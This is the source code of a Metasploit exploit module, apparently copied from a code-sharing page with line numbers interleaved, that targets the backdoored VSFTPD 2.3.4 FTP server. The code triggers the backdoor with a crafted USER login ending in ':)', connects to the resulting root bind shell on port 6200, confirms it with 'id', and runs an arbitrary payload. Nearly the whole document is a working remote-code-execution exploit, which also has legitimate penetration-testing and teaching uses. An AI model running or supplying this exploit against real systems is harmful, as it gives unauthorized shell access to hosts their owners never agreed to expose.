Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
14
      'Description'    => %q{
15
          This module exploits a malicious backdoor that was added to the	VSFTPD download
16
          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
17
          June 30th 2011 and July 1st 2011 according to the most recent information
18
          available. This backdoor was removed on July 3rd 2011.
19
      },
20
      'Author'         => [ 'hdm', 'MC' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'OSVDB', '73573'],
25
          [ 'URL', 'http://pastebin.com/AetT9sS5'],
26
          [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
27
        ],
28
      'Privileged'     => true,
29
      'Platform'       => [ 'unix' ],
30
      'Arch'           => ARCH_CMD,
31
      'Payload'        =>
32
        {
33
          'Space'    => 2000,
34
          'BadChars' => '',
35
          'DisableNops' => true,
36
          'Compat'      =>
37
            {
38
              'PayloadType'    => 'cmd_interact',
39
              'ConnectionType' => 'find'
40
            }
41
        },
42
      'Targets'        =>
43
        [
44
          [ 'Automatic', { } ],
45
        ],
46
      'DisclosureDate' => '2011-07-03',
47
      'DefaultTarget' => 0))
48

49
    register_options([ Opt::RPORT(21) ])
50
  end
51

52
  def exploit
53

54
    nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
55
    if nsock
56
      print_status("The port used by the backdoor bind listener is already open")
57
      handle_backdoor(nsock)
58
      return
59
    end
60

61
    # Connect to the FTP service port first
62
    connect
63

64
    banner = sock.get_once(-1, 30).to_s
65
    print_status("Banner: #{banner.strip}")
66

67
    sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
68
    resp = sock.get_once(-1, 30).to_s
69
    print_status("USER: #{resp.strip}")
70

71
    if resp =~ /^530 /
72
      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
73
      disconnect
74
      return
75
    end
76

77
    if resp !~ /^331 /
78
      print_error("This server did not respond as expected: #{resp.strip}")
79
      disconnect
80
      return
81
    end
82

83
    sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")
84

85
    # Do not bother reading the response from password, just try the backdoor
86
    nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
87
    if nsock
88
      print_good("Backdoor service has been spawned, handling...")
89
      handle_backdoor(nsock)
90
      return
91
    end
92

93
    disconnect
94

95
  end
96

97
  def handle_backdoor(s)
98

99
    s.put("id\n")
100

101
    r = s.get_once(-1, 5).to_s
102
    if r !~ /uid=/
103
      print_error("The service on port 6200 does not appear to be a shell")
104
      disconnect(s)
105
      return
106
    end
107

108
    print_good("UID: #{r.strip}")
109

110
    s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
111
    handler(s)
112
  end
113
end
114

115